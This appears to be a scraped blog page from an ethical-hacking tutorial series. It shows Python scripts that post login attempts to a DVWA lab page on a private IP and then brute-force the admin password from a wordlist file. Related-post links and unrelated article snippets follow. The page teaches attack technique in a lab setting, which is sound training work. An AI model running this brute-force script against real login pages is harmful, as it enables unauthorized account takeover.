Python Ethical Hacking - WEB PENETRATION TESTING(5)
Guessing Login Information on Login Pages
Our target website: http://10.0.0.45/dvwa/login.php
#!/usr/bin/env python import requests target_url = "http://10.0.0.45/dvwa/login.php"
data_dict = {"username": "dfdfddfd", "password": "", "Login": "submit"}
response = requests.post(target_url, data = data_dict)
print(response.content.decode())
Execute the Python Script.
#!/usr/bin/env python import requests target_url = "http://10.0.0.45/dvwa/login.php"
data_dict = {"username": "admin", "password": "password", "Login": "submit"}
response = requests.post(target_url, data = data_dict)
print(response.content.decode())
#!/usr/bin/env python import requests target_url = "http://10.0.0.45/dvwa/login.php"
data_dict = {"username": "admin", "password": "", "Login": "submit"} with open("password.list", "r") as wordlist_file:
for line in wordlist_file:
word = line.strip()
data_dict["password"] = word
response = requests.post(target_url, data=data_dict)
if "Login failed" not in response.content.decode():
print("[+] Got the password --> " + word)
exit() print("[+] Reached end of line.")
Python Ethical Hacking - WEB PENETRATION TESTING(5)的更多相关文章
- Python Ethical Hacking - WEB PENETRATION TESTING(1)
WHAT IS A WEBSITE Computer with OS and some servers. Apache, MySQL ...etc. Cotains web application. ...
- Python Ethical Hacking - WEB PENETRATION TESTING(2)
CRAWING DIRECTORIES Directories/folders inside the web root. Can contain files or other directories ...
- Python Ethical Hacking - WEB PENETRATION TESTING(4)
CRAWING SPIDER Goal -> Recursively list all links starting from a base URL. 1. Read page HTML. 2. ...
- Python Ethical Hacking - WEB PENETRATION TESTING(3)
CRAWLING SUMMARY Our crawler so far can guess: Subdomains. Directories. Files. Advantages: ->Disc ...
- Ethical Hacking - Web Penetration Testing(13)
OWASP ZAP(ZED ATTACK PROXY) Automatically find vulnerabilities in web applications. Free and easy to ...
- Ethical Hacking - Web Penetration Testing(8)
SQL INJECTION WHAT IS SQL? Most websites use a database to store data. Most data stored in it(userna ...
- Ethical Hacking - Web Penetration Testing(10)
SQL INJECTION SQLMAP Tool designed to exploit SQL injections. Works with many DB types, MySQL, MSSQL ...
- Ethical Hacking - Web Penetration Testing(6)
REMOTE FILE INCLUSION Similar to local file inclusion. But allows an attacker to read ANY file from ...
- Ethical Hacking - Web Penetration Testing(4)
CODE EXECUTION VULNS Allows an attacker to execute OS commands. Windows or Linux commands. Can be us ...
随机推荐
- go 项目目录结构
网上有很多误人子弟的教程, 说项目下必须要有src, 傻逼玩意. 正确的路径应该是这样的: 所有go项目路径 src 项目1 项目2 项目N pkg bin 不是所有项目下必须建src, pk ...
- Flutter学习笔记(33)--GestureDetector手势识别
如需转载,请注明出处:Flutter学习笔记(33)--GestureDetector手势识别 这篇随笔主要记录的学习内容是GestureDetector手势识别,内容包括识别单击.双击.长按.组件拖 ...
- DP:0-1背包问题
[问题描述] 0-1背包问题:有 N 个物品,物品 i 的重量为整数 wi >=0,价值为整数 vi >=0,背包所能承受的最大重量为整数 C.如果限定每种物品只能选择0个或1个,求可装的 ...
- unittest模块在linux报错: AttributeError: module 'unittest' has no attribute 'TestRunner'
一开始在windows下运行没有问题,但是在linux下运行却报如下错误: AttributeError: module 'unittest' has no attribute 'TestRunn ...
- Merge,Rebase,Cherry-Pick 一文解惑
代码合并在日常开发中是较为常见的场景,采用合适的合并方式,可以起到事半功倍的效果.对应在 Git 中合并的方式主要有三个,Merge,Rebase,Cherry-Pick. 开始部分会首先介绍一下这三 ...
- Perl入门 - Perl方法的使用
1.定义一个方法 Perl使用sub定义方法. 语法: sub 方法名称{方法体} 2.调用一个方法 Perl直接使用方法名称调用方法. 调用方式有以下四种: 方法名称: &方法名称: 方法名 ...
- android 事件分发机制2-案例测试
我们来看程序的代码: 要求: 1.通过手指移动来拖动图片 2.控制图片不能超出屏幕显示区域 技术点: 1.MotionEvent处理 2.对View进行动态定位(layout) package im. ...
- Zookeeper分布式过程协同技术 - 部署及设置
Zookeeper分布式过程协同技术 - 部署及设置 Zookeeper支持单机模式.伪集群模式.集群模式三种部署方式.演示部署环境为CentOS.jdk版本为1.8.Zookeeper版本为3.4 ...
- 使用IDEA 发布项目搭配远程仓库 Gitee
本次讲解的是idea 发布到gitee上 一样的操作流程 没有基础的请先去学习 附上我的 gitee 地址 有资源会发布到gitee 俗话说关注走一走 活到999 https://gitee.com/ ...
- Python实用笔记 (7)高级特性——切片
列表L = ['Michael', 'Sarah', 'Tracy', 'Bob', 'Jack'] 取前3个元素 >>> L[0:3] ['Michael', 'Sarah', ' ...